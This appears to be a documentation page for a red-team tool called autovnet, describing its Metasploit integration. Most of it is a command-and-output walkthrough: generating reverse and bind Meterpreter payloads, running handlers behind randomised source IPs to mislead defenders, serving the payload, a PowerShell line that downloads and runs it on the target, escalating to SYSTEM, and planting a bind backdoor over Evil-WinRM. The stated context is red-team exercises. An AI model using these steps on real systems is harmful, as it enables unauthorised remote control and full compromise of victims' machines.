        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_7" >
        
          
          <label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Resources
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_7">
            <span class="md-nav__icon md-icon"></span>
            Resources
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/faq/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    FAQ
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/troubleshooting/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Troubleshooting
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/changelog/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Changelog
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/wild/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    In The Wild
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../resources/refs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    References
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  

  
  


<h1 id="metasploit">Metasploit<a class="headerlink" href="#metasploit" title="Permanent link">&para;</a></h1>
<div class="toc">
<ul>
<li><a href="#metasploit">Metasploit</a><ul>
<li><a href="#metasploit-framework-msf">Metasploit Framework (msf)</a><ul>
<li><a href="#proxy-msf">.proxy-msf</a></li>
<li><a href="#msf-reverse">msf reverse</a></li>
<li><a href="#msf-bind">msf bind</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<h2 id="metasploit-framework-msf"><a href="https://docs.rapid7.com/metasploit/msf-overview/">Metasploit Framework (<code>msf</code>)</a><a class="headerlink" href="#metasploit-framework-msf" title="Permanent link">&para;</a></h2>
<p>The <code>msf</code> integration enables configuring any <code>msfvenom</code> reverse or bind payload via <code>autovnet</code>, which provides
* payload tracking by codename
* source IP obfuscation for bind payloads
* automatic C2 provisioning for reverse payloads
* easy payload sharing</p>
<h3 id="proxy-msf"><code>.proxy-msf</code><a class="headerlink" href="#proxy-msf" title="Permanent link">&para;</a></h3>
<p>If you want to use any of Metasploit's built in scanners, etc. that connect to a target machine, try using <code>.proxy-msf</code> in place of <code>msfconsole</code>.</p>
<div class="highlight"><pre><span></span><code>.proxy-msf
msf6<span class="w"> </span>&gt;
</code></pre></div>
<p>It <em>is</em> <code>msfconsole</code>, but proxychain'ed behind <code>autovnet</code> for source IP randomization.</p>
<h3 id="msf-reverse">msf reverse<a class="headerlink" href="#msf-reverse" title="Permanent link">&para;</a></h3>
<p><code>autovnet rtfm msf reverse</code> is an extremely powerful command that can be a huge time saver.</p>
<p>It generates an <code>msfvenom</code> payload (of the type you specify), configures and starts the handler required to catch the session, and saves everything for later by codename so you can trivially re-start this exact handler.</p>
<p>That's right: <em>no more forgetting how you configured your payloads</em>!</p>
<p>The output below is seperated and annotated to indiciate what generated it.</p>
<p>The default payload is currently a Windows payload.</p>
<p>First, <code>msfvenom</code> will generate it for us:
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>msf<span class="w"> </span>reverse<span class="w"> </span>-f<span class="w"> </span>exe
<span class="c1">##### OUTPUT FROM MSFVENOM #####</span>
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>No<span class="w"> </span>platform<span class="w"> </span>was<span class="w"> </span>selected,<span class="w"> </span>choosing<span class="w"> </span>Msf::Module::Platform::Windows<span class="w"> </span>from<span class="w"> </span>the<span class="w"> </span>payload
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>No<span class="w"> </span>arch<span class="w"> </span>selected,<span class="w"> </span>selecting<span class="w"> </span>arch:<span class="w"> </span>x64<span class="w"> </span>from<span class="w"> </span>the<span class="w"> </span>payload
No<span class="w"> </span>encoder<span class="w"> </span>specified,<span class="w"> </span>outputting<span class="w"> </span>raw<span class="w"> </span>payload
Payload<span class="w"> </span>size:<span class="w"> </span><span class="m">201308</span><span class="w"> </span>bytes
Final<span class="w"> </span>size<span class="w"> </span>of<span class="w"> </span>exe<span class="w"> </span>file:<span class="w"> </span><span class="m">207872</span><span class="w"> </span>bytes
Saved<span class="w"> </span>as:<span class="w"> </span>/opt/rtfm/msf/luxuriant_present/luxuriant_present.exe
</code></pre></div></p>
<p>Next, <code>autovnet</code> will print the full path to the payload, and some helpful commands we will refer to later.
<div class="highlight"><pre><span></span><code><span class="c1">##### OUTPUT FROM AUTOVNET #####</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>listen<span class="w"> </span>luxuriant_present
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">====================</span><span class="w"> </span><span class="o">[</span>luxuriant_present<span class="o">]</span><span class="w"> </span><span class="o">====================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>payload<span class="w"> </span>:<span class="w"> </span>/opt/rtfm/msf/luxuriant_present/luxuriant_present.exe
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>share<span class="w">   </span>:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>share<span class="w"> </span>--msf<span class="w"> </span>luxuriant_present
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>handle<span class="w">  </span>:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>msf<span class="w"> </span>handle<span class="w"> </span>luxuriant_present
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">====================</span><span class="w"> </span><span class="o">[</span>luxuriant_present<span class="o">]</span><span class="w"> </span><span class="o">====================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>luxuriant_present<span class="w"> </span><span class="p">|</span><span class="w"> </span><span class="m">10</span>.232.30.245:443<span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">127</span>.1.33.7:65459
</code></pre></div></p>
<p>Finally, <code>msfconsole</code> starts and is configured (using generated <code>.rc</code> scripts) to match the payload we just generated.
<div class="highlight"><pre><span></span><code><span class="c1">##### OUTPUT FROM MSFCONSOLE #####</span>
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>Cannot<span class="w"> </span>find<span class="w"> </span>resource<span class="w"> </span>script:<span class="w"> </span>/opt/rtfm/msf/luxuriant_present/vars.rc
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Processing<span class="w"> </span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="w"> </span><span class="k">for</span><span class="w"> </span>ERB<span class="w"> </span>directives.
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="o">)</span>&gt;<span class="w"> </span>use<span class="w"> </span>exploit/multi/handler
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Using<span class="w"> </span>configured<span class="w"> </span>payload<span class="w"> </span>generic/shell_reverse_tcp
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>payload<span class="w"> </span>windows/x64/meterpreter_reverse_https
<span class="nv">payload</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span>windows/x64/meterpreter_reverse_https
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>LHOST<span class="w"> </span><span class="m">10</span>.232.30.245
<span class="nv">LHOST</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">10</span>.232.30.245
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>SRVHOST<span class="w"> </span><span class="m">10</span>.232.30.245
<span class="nv">SRVHOST</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">10</span>.232.30.245
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>ReverseListenerBindAddress<span class="w"> </span><span class="m">127</span>.1.33.7
<span class="nv">ReverseListenerBindAddress</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">127</span>.1.33.7
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>LPORT<span class="w"> </span><span class="m">65459</span>
<span class="nv">LPORT</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">65459</span>
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>SRVPORT<span class="w"> </span><span class="m">443</span>
<span class="nv">SRVPORT</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">443</span>
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/luxuriant_present/handle.rc<span class="o">)</span>&gt;<span class="w"> </span>run
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Started<span class="w"> </span>HTTPS<span class="w"> </span>reverse<span class="w"> </span>handler<span class="w"> </span>on<span class="w"> </span>https://127.1.33.7:65459
</code></pre></div></p>
<p>At this point, <code>msfconsole</code> is waiting for the payload to connect.</p>
<p>As the Red Teamer, it is our turn to transfer the payload to the target system and execute it.</p>
<p>In the output above, a <code>share</code> command was printed that includes our codename, <code>luxuriant_present</code></p>
<p>We can run it to start a <code>share</code> (file server) serving the payload we generated:</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>share<span class="w"> </span>--msf<span class="w"> </span>luxuriant_present
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>share<span class="w"> </span>messy_clerk
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">=======================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>Sharing:<span class="w"> </span>/tmp/rtfm_share_kh8i71bv
<span class="w">   </span><span class="o">[</span>*<span class="o">]</span><span class="w"> </span>staged<span class="w">   </span>:<span class="w"> </span>/luxuriant_present.exe<span class="w"> </span><span class="o">(</span><span class="w"> </span>/opt/rtfm/msf/luxuriant_present/luxuriant_present.exe<span class="w"> </span><span class="o">)</span>
<span class="w">   </span><span class="o">[</span>+<span class="o">]</span><span class="w"> </span>download<span class="w"> </span>:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>download<span class="w"> </span>https://10.199.44.91/luxuriant_present.exe
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">=======================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>http://10.224.91.178
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">=======================================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>https://10.199.44.91
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">=======================================</span>
Creating<span class="w"> </span>network<span class="w"> </span><span class="s2">&quot;rtfm_share_42371_59263_default&quot;</span><span class="w"> </span>with<span class="w"> </span>the<span class="w"> </span>default<span class="w"> </span>driver
Creating<span class="w"> </span>rtfm_share_42371_59263_file_server_1<span class="w"> </span>...<span class="w"> </span><span class="k">done</span>
Attaching<span class="w"> </span>to<span class="w"> </span>rtfm_share_42371_59263_file_server_1
file_server_1<span class="w">  </span><span class="p">|</span><span class="w"> </span><span class="m">2021</span>/12/13<span class="w"> </span><span class="m">21</span>:12:07<span class="w"> </span><span class="o">[</span>+<span class="o">]</span><span class="w"> </span>Waiting<span class="w"> </span><span class="k">for</span><span class="w"> </span>requests...
</code></pre></div>
<p>You may wonder:</p>
<blockquote>
<p>Why does the <code>share</code> have the codename <code>messy_clerk</code>, while the payload's codename is <code>luxuriant_present</code>?</p>
</blockquote>
<p>That's because <code>autovnet rtfm share --msf luxuriant_present</code> means</p>
<blockquote>
<p>Serve <code>luxuriant_present</code> using a random, emphemeral server</p>
</blockquote>
<p>while <code>autovnet rtfm share messy_clerk</code> means</p>
<blockquote>
<p>Re-create that file server we used to have that served <code>luxuriant_present.exe</code> on URLs <code>http://10.224.91.178</code> and <code>https://10.199.44.91</code></p>
</blockquote>
<p>Both are valid, and the one you should use depends on how you want to look to the Blue Team.</p>
<p>Re-running <code>autovnet rtfm share --msf luxuriant_present</code> makes you 1 actor with 2 payload servers,
while <code>autovnet rtfm share messy_clerk</code> would make you 1 actor with 1 payload server.</p>
<p>Regardless, we now have a url hosting our payload: <code>http://10.224.91.178/luxuriant_present.exe</code>
(we'll use the HTTP URL in this example due to <code>powershell</code> limitations).</p>
<div class="highlight"><pre><span></span><code><span class="c"># Target - Download and Execute</span>
<span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">iwr </span><span class="n">http</span><span class="p">://</span><span class="n">10</span><span class="p">.</span><span class="n">224</span><span class="p">.</span><span class="n">91</span><span class="p">.</span><span class="n">178</span><span class="p">/</span><span class="n">luxuriant_present</span><span class="p">.</span><span class="n">exe</span> <span class="n">-OutFile</span> <span class="n">luxuriant_present</span><span class="p">.</span><span class="n">exe</span>
<span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="p">./</span><span class="n">luxuriant_present</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<p>Which should be immediately caught by our listener:
<div class="highlight"><pre><span></span><code>...
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Started<span class="w"> </span>HTTPS<span class="w"> </span>reverse<span class="w"> </span>handler<span class="w"> </span>on<span class="w"> </span>https://127.1.33.7:65459
<span class="o">[</span>!<span class="o">]</span><span class="w"> </span>https://127.1.33.7:65459<span class="w"> </span>handling<span class="w"> </span>request<span class="w"> </span>from<span class="w"> </span><span class="m">127</span>.0.0.1<span class="p">;</span><span class="w"> </span><span class="o">(</span>UUID:<span class="w"> </span>ao8cpe5l<span class="o">)</span><span class="w"> </span>Without<span class="w"> </span>a<span class="w"> </span>database<span class="w"> </span>connected<span class="w"> </span>that<span class="w"> </span>payload<span class="w"> </span>UUID<span class="w"> </span>tracking<span class="w"> </span>will<span class="w"> </span>not<span class="w"> </span>work!
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>https://127.1.33.7:65459<span class="w"> </span>handling<span class="w"> </span>request<span class="w"> </span>from<span class="w"> </span><span class="m">127</span>.0.0.1<span class="p">;</span><span class="w"> </span><span class="o">(</span>UUID:<span class="w"> </span>ao8cpe5l<span class="o">)</span><span class="w"> </span>Redirecting<span class="w"> </span>stageless<span class="w"> </span>connection<span class="w"> </span>from<span class="w"> </span>/YaCi_jEqypy7JLom2pMCZg_Axk1amsIKO00Y5YhbepGBA1BeTyjcx093ckvqkZ1xRr2lSgJy36ZEm93K2gJ49hTjH1vjucaV2Zq0lf3hOnnhCcE8-kHkzkaD8tv1m<span class="w"> </span>with<span class="w"> </span>UA<span class="w"> </span><span class="s1">&#39;Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko&#39;</span>
<span class="o">[</span>!<span class="o">]</span><span class="w"> </span>https://127.1.33.7:65459<span class="w"> </span>handling<span class="w"> </span>request<span class="w"> </span>from<span class="w"> </span><span class="m">127</span>.0.0.1<span class="p">;</span><span class="w"> </span><span class="o">(</span>UUID:<span class="w"> </span>ao8cpe5l<span class="o">)</span><span class="w"> </span>Without<span class="w"> </span>a<span class="w"> </span>database<span class="w"> </span>connected<span class="w"> </span>that<span class="w"> </span>payload<span class="w"> </span>UUID<span class="w"> </span>tracking<span class="w"> </span>will<span class="w"> </span>not<span class="w"> </span>work!
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>https://127.1.33.7:65459<span class="w"> </span>handling<span class="w"> </span>request<span class="w"> </span>from<span class="w"> </span><span class="m">127</span>.0.0.1<span class="p">;</span><span class="w"> </span><span class="o">(</span>UUID:<span class="w"> </span>ao8cpe5l<span class="o">)</span><span class="w"> </span>Attaching<span class="w"> </span>orphaned/stageless<span class="w"> </span>session...
<span class="o">[</span>!<span class="o">]</span><span class="w"> </span>https://127.1.33.7:65459<span class="w"> </span>handling<span class="w"> </span>request<span class="w"> </span>from<span class="w"> </span><span class="m">127</span>.0.0.1<span class="p">;</span><span class="w"> </span><span class="o">(</span>UUID:<span class="w"> </span>ao8cpe5l<span class="o">)</span><span class="w"> </span>Without<span class="w"> </span>a<span class="w"> </span>database<span class="w"> </span>connected<span class="w"> </span>that<span class="w"> </span>payload<span class="w"> </span>UUID<span class="w"> </span>tracking<span class="w"> </span>will<span class="w"> </span>not<span class="w"> </span>work!
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Meterpreter<span class="w"> </span>session<span class="w"> </span><span class="m">1</span><span class="w"> </span>opened<span class="w"> </span><span class="o">(</span><span class="m">127</span>.1.33.7:65459<span class="w"> </span>-&gt;<span class="w"> </span><span class="m">127</span>.0.0.1<span class="w"> </span><span class="o">)</span><span class="w"> </span>at<span class="w"> </span><span class="m">2021</span>-12-13<span class="w"> </span><span class="m">16</span>:21:06<span class="w"> </span>-0500
meterpreter<span class="w"> </span>&gt;<span class="w"> </span>getsystem
...got<span class="w"> </span>system<span class="w"> </span>via<span class="w"> </span>technique<span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="o">(</span>Named<span class="w"> </span>Pipe<span class="w"> </span>Impersonation<span class="w"> </span><span class="o">(</span>In<span class="w"> </span>Memory/Admin<span class="o">))</span>.
meterpreter<span class="w"> </span>&gt;<span class="w"> </span>getuid
Server<span class="w"> </span>username:<span class="w"> </span>NT<span class="w"> </span>AUTHORITY<span class="se">\S</span>YSTEM
</code></pre></div>
You can then full exit out of <code>msfconsole</code> with <code>exit</code>, <code>exit</code>.</p>
<p>To restart the listener, simply use the <code>handle</code> command that <code>autovnet</code> printed:</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>msf<span class="w"> </span>handle<span class="w"> </span>luxuriant_present
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>luxuriant_present<span class="w"> </span><span class="p">|</span><span class="w"> </span><span class="m">10</span>.232.30.245:443<span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">127</span>.1.33.7:65459
...
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Started<span class="w"> </span>HTTPS<span class="w"> </span>reverse<span class="w"> </span>handler<span class="w"> </span>on<span class="w"> </span>https://127.1.33.7:65459
</code></pre></div>
<p>If you re-execute the payload (or if it is still running on the target), it should open a new session.</p>
<h3 id="msf-bind">msf bind<a class="headerlink" href="#msf-bind" title="Permanent link">&para;</a></h3>
<p><code>autovnet rtfm msf bind</code> is very similar to <a href="#msf-reverse">msf reverse</a>, but for bind-type payloads.</p>
<p>When you "handle" / connect to a bind payload, the connection is proxied through <code>autovnet</code> using a random source IP.</p>
<p>Since <code>autovnet</code> is creating a handler for you, you need to tell <code>autovnet</code> where you plan on installing the bind payload,
and confirm when it is ready to try to connect to it.</p>
<p>In this example, our Windows target has a DNS name / <code>/etc/hosts</code> entry of <code>win-target</code>:</p>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>msf<span class="w"> </span><span class="nb">bind</span><span class="w"> </span>-f<span class="w"> </span>exe<span class="w"> </span>-r<span class="w"> </span>win-target
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>No<span class="w"> </span>platform<span class="w"> </span>was<span class="w"> </span>selected,<span class="w"> </span>choosing<span class="w"> </span>Msf::Module::Platform::Windows<span class="w"> </span>from<span class="w"> </span>the<span class="w"> </span>payload
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>No<span class="w"> </span>arch<span class="w"> </span>selected,<span class="w"> </span>selecting<span class="w"> </span>arch:<span class="w"> </span>x64<span class="w"> </span>from<span class="w"> </span>the<span class="w"> </span>payload
No<span class="w"> </span>encoder<span class="w"> </span>specified,<span class="w"> </span>outputting<span class="w"> </span>raw<span class="w"> </span>payload
Payload<span class="w"> </span>size:<span class="w"> </span><span class="m">200262</span><span class="w"> </span>bytes
Final<span class="w"> </span>size<span class="w"> </span>of<span class="w"> </span>exe<span class="w"> </span>file:<span class="w"> </span><span class="m">206848</span><span class="w"> </span>bytes
Saved<span class="w"> </span>as:<span class="w"> </span>/opt/rtfm/msf/maddening_major/maddening_major.exe
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">====================</span><span class="w"> </span><span class="o">[</span>maddening_major<span class="o">]</span><span class="w"> </span><span class="o">====================</span>
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>payload<span class="w"> </span>:<span class="w"> </span>/opt/rtfm/msf/maddening_major/maddening_major.exe
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>share<span class="w">   </span>:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>share<span class="w"> </span>--msf<span class="w"> </span>maddening_major
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span>handle<span class="w">  </span>:<span class="w"> </span>autovnet<span class="w"> </span>rtfm<span class="w"> </span>msf<span class="w"> </span>handle<span class="w"> </span>maddening_major
<span class="o">[</span>+<span class="o">]</span><span class="w"> </span><span class="o">====================</span><span class="w"> </span><span class="o">[</span>maddening_major<span class="o">]</span><span class="w"> </span><span class="o">====================</span>
<span class="o">[</span>!<span class="o">]</span><span class="w"> </span>Install<span class="w"> </span>the<span class="w"> </span>payload<span class="w"> </span>on<span class="w"> </span>win-target,<span class="w"> </span><span class="k">then</span><span class="w"> </span>press<span class="w"> </span>&lt;ENTER&gt;<span class="w"> </span>to<span class="w"> </span>connect&gt;
</code></pre></div>
<p>Notice that you are prompted to press <code>&lt;ENTER&gt;</code> when you are ready to connect.
If you accidentally press enter too early, you can always use the handle command
(e.g. <code>autovnet rtfm msf handle maddening_major</code>) to retry when you are ready
<div class="highlight"><pre><span></span><code>This time, let&#39;s use `.proxy-winrm` to upload our payload:
```bash
$ .proxy-winrm -u Administrator -i win-target
Enter Password:

Evil-WinRM shell v3.3
...
*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; cd C:\
*Evil-WinRM* PS C:\&gt; upload /opt/rtfm/msf/maddening_major/maddening_major.exe C:\maddening_major.exe
Info: Uploading /opt/rtfm/msf/maddening_major/maddening_major.exe to C:\maddening_major.exe


Data: 275796 bytes of 275796 bytes copied

Info: Upload successful!
</code></pre></div></p>
<p>We can also execute it through our <code>evil-winrm</code> shell.
Note that <code>./example.exe</code> seems to work well, but <code>.\example.exe</code> does not seem to execute the file. YMMV.</p>
<p>It should background itself, but still be running in the process list.
<div class="highlight"><pre><span></span><code>*Evil-WinRM*<span class="w"> </span>PS<span class="w"> </span>C:<span class="se">\&gt;</span><span class="w"> </span>./maddening_major.exe
*Evil-WinRM*<span class="w"> </span>PS<span class="w"> </span>C:<span class="se">\&gt;</span><span class="w"> </span>tasklist<span class="w"> </span>/v<span class="w"> </span><span class="p">|</span><span class="w"> </span>findstr<span class="w"> </span>maddening_major
maddening_major.exe<span class="w">           </span><span class="m">2756</span><span class="w"> </span>Services<span class="w">                   </span><span class="m">0</span><span class="w">      </span><span class="m">3</span>,360<span class="w"> </span>K<span class="w"> </span>Unknown<span class="w">         </span>WIN-XXXXXXXXX<span class="se">\A</span>dministrator<span class="w">                           </span><span class="m">0</span>:00:00<span class="w"> </span>N/A
</code></pre></div></p>
<p>Then, we can return to our waiting handler and press <code>&lt;ENTER&gt;</code> to connect to our newly installed backdoor:
<div class="highlight"><pre><span></span><code>...
<span class="o">[</span>!<span class="o">]</span><span class="w"> </span>Install<span class="w"> </span>the<span class="w"> </span>payload<span class="w"> </span>on<span class="w"> </span>win-target,<span class="w"> </span><span class="k">then</span><span class="w"> </span>press<span class="w"> </span>&lt;ENTER&gt;<span class="w"> </span>to<span class="w"> </span>connect&gt;
<span class="o">[</span>-<span class="o">]</span><span class="w"> </span>Cannot<span class="w"> </span>find<span class="w"> </span>resource<span class="w"> </span>script:<span class="w"> </span>/opt/rtfm/msf/maddening_major/vars.rc
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Processing<span class="w"> </span>/opt/rtfm/msf/maddening_major/handle.rc<span class="w"> </span><span class="k">for</span><span class="w"> </span>ERB<span class="w"> </span>directives.
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/maddening_major/handle.rc<span class="o">)</span>&gt;<span class="w"> </span>use<span class="w"> </span>exploit/multi/handler
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Using<span class="w"> </span>configured<span class="w"> </span>payload<span class="w"> </span>generic/shell_reverse_tcp
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/maddening_major/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>payload<span class="w"> </span>windows/x64/meterpreter_bind_tcp
<span class="nv">payload</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span>windows/x64/meterpreter_bind_tcp
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/maddening_major/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>RHOST<span class="w"> </span>win-target
<span class="nv">RHOST</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span>win-target
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/maddening_major/handle.rc<span class="o">)</span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>LPORT<span class="w"> </span><span class="m">3398</span>
<span class="nv">LPORT</span><span class="w"> </span><span class="o">=</span>&gt;<span class="w"> </span><span class="m">3398</span>
resource<span class="w"> </span><span class="o">(</span>/opt/rtfm/msf/maddening_major/handle.rc<span class="o">)</span>&gt;<span class="w"> </span>run
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Started<span class="w"> </span><span class="nb">bind</span><span class="w"> </span>TCP<span class="w"> </span>handler<span class="w"> </span>against<span class="w"> </span>win-target:3398
<span class="o">[</span>*<span class="o">]</span><span class="w"> </span>Meterpreter<span class="w"> </span>session<span class="w"> </span><span class="m">1</span><span class="w"> </span>opened<span class="w"> </span><span class="o">(</span><span class="m">192</span>.168.50.5:48626<span class="w"> </span>-&gt;<span class="w"> </span><span class="m">10</span>.255.93.118:1080<span class="w"> </span><span class="o">)</span><span class="w"> </span>at<span class="w"> </span><span class="m">2021</span>-12-13<span class="w"> </span><span class="m">16</span>:37:37<span class="w"> </span>-0500

meterpreter<span class="w"> </span>&gt;
</code></pre></div></p>





                
              </article>
            </div>
          
          
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12Z"/></svg>
  Back to top
</button>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    <script id="__config" type="application/json">{"base": "../../..", "features": ["search.suggest", "search.highlight", "navigation.instant", "navigation.tracking", "navigation.tabs", "navigation.tabs.sticky", "navigation.top", "navigation.expand", "toc.integrate", "toc.follow", "navigation.top", "content.code.copy"], "search": "../../../assets/javascripts/workers/search.f886a092.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
    
    
      <script src="../../../assets/javascripts/bundle.aecac24b.min.js"></script>
      
    
  </body>
</html>